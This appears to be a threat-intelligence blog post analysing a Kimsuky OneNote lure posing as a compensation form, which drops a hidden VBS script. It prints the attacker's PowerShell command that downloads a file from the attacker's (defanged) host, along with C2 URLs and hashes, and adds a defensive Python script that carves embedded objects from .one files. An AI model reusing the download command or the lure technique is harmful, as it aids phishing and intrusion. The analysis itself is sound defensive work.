OneNote Malware Disguised as Compensation Form (Kimsuky)

AhnLab Security Emergency response Center (ASEC) has discovered the distribution of OneNote malware disguised as a compensation-related form. The confirmed file impersonates the same research center as the LNK-type malware covered in the post below. Based on the identical malicious activity performed by the VBS files, the team has deduced that the same threat actor is behind both incidents.

As shown in the figure below, a page discussing compensation appears when the OneNote file is opened, and prompts users to click on what appears to be the area where an HWP file is attached.

Figure 1. Contents displayed upon opening the OneNote file

Figure 2 makes it clear that this area does not contain an HWP file; rather, it conceals a malicious script object named ‘personal.vbs’.

Figure 2. Concealed malicious script

If a user clicks this object, the malicious VBS file is dropped as personal.vbs in a temporary directory and executed. The generated VBS file stores the obfuscated command so that it looks like a comment (annotation), then re-reads its own contents to decode and execute the actual malicious command.

Figure 3. personal.vbs code
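The script object in the figures above is stored inside the .one file as an embedded file. As an added triage example that is not part of the original post, the following Python script carves embedded file objects out of a OneNote file by their FileDataStoreObject header GUID (from Microsoft's [MS-ONESTORE] specification) and flags the ones whose contents look like a script. The sample .one buffer, the build_sample_one() helper and the script keyword list are constructed for this example.

```python
import re
import struct
from dataclasses import dataclass

# On-disk (little-endian) form of the FileDataStoreObject header GUID
# {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} defined in [MS-ONESTORE].
FDSO_HEADER = bytes.fromhex("E716E3BD65261145A4C48D4D0B7A9EAC")
FDSO_HDR_LEN = 36  # guidHeader(16) + cbLength(8) + unused(4) + reserved(8)

# Constructed keyword list: plain text containing any of these is treated as a script.
SCRIPT_MARKERS = re.compile(rb"CreateObject|WScript\.Shell|Execute\s*\(|powershell", re.I)

@dataclass
class Embedded:
    offset: int   # offset of the file data inside the .one blob
    size: int
    kind: str     # "pe", "ole", "script", "text" or "binary"
    data: bytes

def classify(data: bytes) -> str:
    """Coarse content type of one embedded object; HWP 5.x files are OLE containers."""
    if data.startswith(b"MZ"):
        return "pe"
    if data.startswith(b"\xd0\xcf\x11\xe0"):
        return "ole"
    try:
        data.decode("ascii")
    except UnicodeDecodeError:
        return "binary"
    return "script" if SCRIPT_MARKERS.search(data) else "text"

def carve(blob: bytes) -> list[Embedded]:
    """Return every embedded file object found by scanning for the header GUID."""
    found = []
    pos = blob.find(FDSO_HEADER)
    while pos != -1:
        (size,) = struct.unpack_from("<Q", blob, pos + 16)   # cbLength
        start = pos + FDSO_HDR_LEN
        data = blob[start:start + size]
        if len(data) == size:   # ignore bogus or truncated length fields
            found.append(Embedded(start, size, classify(data), data))
        pos = blob.find(FDSO_HEADER, pos + 16)
    return found

def build_sample_one(payloads: list[bytes]) -> bytes:
    """Constructed stand-in for a .one file: filler bytes around FileDataStoreObjects."""
    out = bytearray(b"\x00" * 64)
    for p in payloads:
        out += FDSO_HEADER + struct.pack("<Q", len(p)) + b"\x00" * 12 + p + b"\xff" * 8
    return bytes(out)

# Constructed dropper-like VBS text, mimicking a payload hidden in a comment.
SAMPLE_VBS = b"' obfuscated payload kept in a comment\r\nSet sh = CreateObject(\"WScript.Shell\")\r\n"

if __name__ == "__main__":
    for e in carve(build_sample_one([b"just a note", SAMPLE_VBS])):
        print(f"offset={e.offset} size={e.size} kind={e.kind}")
```

On a real file, read the .one bytes and pass them to carve(); an object of kind "script" or "pe" behind what the page displays as a document attachment is the pattern described above.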

The decrypted script code ultimately accesses hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1 to execute additional script code. This URL is currently inaccessible, but its format indicates that it most likely served an information-stealing script like the one in the post below.

Afterward, it downloads and opens an HWP file from hxxp://delps.scienceontheweb.net/ital/info/sample.hwp through a PowerShell command.

  • Executed PowerShell command
    powershell $curpath=(New-Object -ComObject Shell.Application).NameSpace('shell:Downloads').Self.Path;Invoke-WebRequest -Uri hxxp://delps.scienceontheweb.net/ital/info/sample.hwp -OutFile $curpath\personal.hwp;start-sleep -seconds 1

Figure 4. Ultimately executed script code

Although the HWP file could not be downloaded at the time of analysis, it is presumed that a benign HWP file was used to deceive users. Additionally, since the HWP filename displayed in the OneNote file is the same as the filename (PersonalDataUseAgreement.hwp) shown in Figure 10 of the post <Malware Distributed Disguised as a Password File> (PersonalInfoUseAgreement.hwp), it is assumed that a similar HWP file was used in this case as well.

The Kimsuky group, which previously distributed its malware as Word files, has recently been confirmed distributing it in various other forms such as CHM, LNK, and OneNote, so users are strongly advised to exercise extra caution. These files are usually distributed via emails disguised as forms related to compensation or personal information, so users must be careful when opening email attachments.

[File Detection]
Dropper/MSOffice.Generic (2023.03.20.02)
Trojan/VBS.Generic.SC186657 (2023.03.03.00)

[IOC]
MD5
aa756b20170aa0869d6f5d5b5f1b7c37 – OneNote
f2a0e92b80928830704a00c91df87644 – VBS

C2
hxxp://delps.scienceontheweb.net/ital/info/list.php?query=1

The post OneNote Malware Disguised as Compensation Form (Kimsuky) appeared first on ASEC BLOG.

Article Link: https://asec.ahnlab.com/en/50303/